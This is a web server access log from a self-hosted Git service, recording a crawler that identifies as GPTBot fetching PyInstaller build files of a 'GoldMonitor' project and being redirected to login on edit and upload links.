"/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 910] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153950] [Gzip 31.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 910] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 910] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151976] [Gzip 30.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153735] [Gzip 31.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:26:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:26:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71433] [Gzip 17.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 72143] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72306] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 71125] [Gzip 17.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 72262] [Gzip 17.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 71073] [Gzip 17.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38840] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37269] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38840] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:26:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:26:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:26:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:26:46 